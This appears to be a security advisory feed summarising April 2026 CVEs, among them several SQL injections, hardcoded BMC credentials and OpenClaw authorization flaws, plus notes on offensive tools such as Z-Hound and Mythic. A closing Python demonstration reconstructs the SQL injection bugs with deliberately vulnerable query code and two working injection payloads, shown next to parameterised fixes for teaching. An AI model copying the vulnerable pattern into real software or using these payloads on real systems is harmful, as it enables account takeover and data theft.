OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. Attackers can invoke POST /reset-profile through the browser.request surface to stop the running browser, close Playwright connections, and move profile directories to Trash, crossing intended privilege boundaries. CVSSv3.1 8.1 (HIGH)

CWE-863 · VND: Openclaw · TYP: Vulnerability
CVSS v3.1: 8.1
Score: 91
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35643 — Openclaw Openclaw: before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35643

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application context. CVSSv3.1 8.8 (HIGH)

CWE-940 · VND: Openclaw · TYP: Vulnerability
CVSS v3.1: 8.8
Score: 94
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35595 — Vikunja: Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-35595

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain. When a user has inherited Write access (from a paren CVSSv3.1 8.3 (HIGH)

CWE-269 · VND: Vikunja · TYP: Vulnerability
CVSS v3.1: 8.3
Score: 92
2026-04-10
2026-04-10 16:16Z
CRIT

CVE-2026-23781 — BMC: If left unchanged, these credentials can be easily obtained and may allow unauthorized access

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-23781

An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface. CVSSv3.1 9.8 (CRITICAL)

CWE-798 · VND: Bmc · TYP: Vulnerability
CVSS v3.1: 9.8
Score: 99
2026-04-10
2026-04-10 15:57Z
INFO

Z-Hound — Single-file, browser-based Active Directory attack graph tool for SharpHound and AzureHound collection data. No server.

GitHub · AD attack tooling · github.com · GITHUB POC

Z-Hound is a single-file, browser-based Active Directory attack graph visualization tool that parses SharpHound and AzureHound collection data without requiring Neo4j, server infrastructure, or installation. It provides interactive graph rendering, automated risk scoring, attack path analysis, NTLM relay chain synthesis, ADCS ESC detection, and Azure/Entra ID support—all processing occurs client-side in the browser with no data exfiltration.

SRF: Os · TAC: TA0006 · TAC: TA0007 · SRF: Identity · VND: Microsoft · TYP: Research · TYP: Tool · STG: Discovery
Score: 78
2026-04-10
2026-04-10 15:36Z
INFO

v3.4.0.56

Mythic releases · github.com

Mythic v3.4.0.56 released with a Dockerfile tag bump to match the release version. No detailed changelog or feature notes are provided in the GitHub release page.

VND: Mythic · TYP: Tool
Score: 15
2026-04-10
2026-04-10 15:16Z
CRIT

CVE-2026-36236 — Janobe Engineers_online_portal: SourceCodester Engineers Online Portal v1.0 is vulnerable to SQL Injection in update_password.php via the

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-36236

SourceCodester Engineers Online Portal v1.0 is vulnerable to SQL Injection in update_password.php via the new_password parameter. CVSSv3.1 9.8 (CRITICAL)

CWE-89 · VND: Janobe · VND: Sourcecodester · TYP: Vulnerability
CVSS v3.1: 9.8
Score: 99
2026-04-10
2026-04-10 15:16Z
CRIT

CVE-2026-36235 — Itsourcecode Online_student_enrollment_system: A SQL injection vulnerability was found in the scheduleSubList.php file of itsourcecode Online Student

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-36235

A SQL injection vulnerability was found in the scheduleSubList.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that the 'subjcode' parameter is directly embedded into the SQL query via string interpolation without any sanitization or validation. CVSSv3.1 9.8 (CRITICAL)

CWE-89 · VND: Itsourcecode · TYP: Vulnerability
CVSS v3.1: 9.8
Score: 99
2026-04-10
2026-04-10 15:16Z
CRIT

CVE-2026-36234 — Itsourcecode Online_student_enrollment_system: Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-36234

itsourcecode Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via the 'coursename' parameter. CVSSv3.1 9.8 (CRITICAL)

CWE-89 · VND: Itsourcecode · VND: Online · TYP: Vulnerability
CVSS v3.1: 9.8
Score: 99
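The three SQL injection entries above (CVE-2026-36236, CVE-2026-36235, CVE-2026-36234) share one cause: a request parameter interpolated into the query string. The Python below is an added example for this page and not code from either PHP application; it reconstructs the two query shapes the entries imply (an UPDATE on a password column driven by new_password, and a SELECT filtered by subjcode) against an in-memory SQLite database, and runs each beside its parameterised form. The schema, rows, exact query text and both payloads are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows standing in for the portals' tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "hash-a"), (2, "bob", "hash-b"), (3, "admin", "hash-admin")])
    conn.execute("CREATE TABLE subjects (subjcode TEXT, title TEXT, restricted INTEGER)")
    conn.executemany("INSERT INTO subjects VALUES (?, ?, ?)",
                     [("CS101", "Intro", 0), ("SEC900", "Hidden syllabus", 1)])
    return conn


def update_password_vulnerable(conn, user_id, new_password):
    """String interpolation, as the update_password.php entry describes (query shape assumed)."""
    conn.execute(f"UPDATE users SET password='{new_password}' WHERE id={int(user_id)}")


def update_password_safe(conn, user_id, new_password):
    """Bound parameter: the value can never change the statement's structure."""
    conn.execute("UPDATE users SET password=? WHERE id=?", (new_password, int(user_id)))


def schedule_lookup_vulnerable(conn, subjcode):
    """The scheduleSubList.php shape: parameter interpolated into a WHERE clause (assumed)."""
    return conn.execute(
        f"SELECT subjcode, title FROM subjects WHERE subjcode='{subjcode}' AND restricted=0"
    ).fetchall()


def schedule_lookup_safe(conn, subjcode):
    return conn.execute(
        "SELECT subjcode, title FROM subjects WHERE subjcode=? AND restricted=0", (subjcode,)
    ).fetchall()


def passwords(conn) -> dict:
    return dict(conn.execute("SELECT username, password FROM users ORDER BY id"))


def demo() -> dict:
    pw_payload = "pwned' WHERE 1=1 --"     # constructed: closes the literal, drops the id filter
    code_payload = "x' OR 1=1 --"           # constructed: drops the restricted=0 filter
    vuln, safe = make_db(), make_db()
    update_password_vulnerable(vuln, 2, pw_payload)   # every account, not just id 2
    update_password_safe(safe, 2, pw_payload)         # only bob, and his password is the odd string
    return {
        "vulnerable_passwords": passwords(vuln),
        "safe_passwords": passwords(safe),
        "vulnerable_lookup": schedule_lookup_vulnerable(vuln, code_payload),   # restricted row leaks
        "safe_lookup": schedule_lookup_safe(safe, code_payload),               # no such code
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

A real password handler would also hash the new value before storing it; that is left out here so the injection effect stays visible in the table.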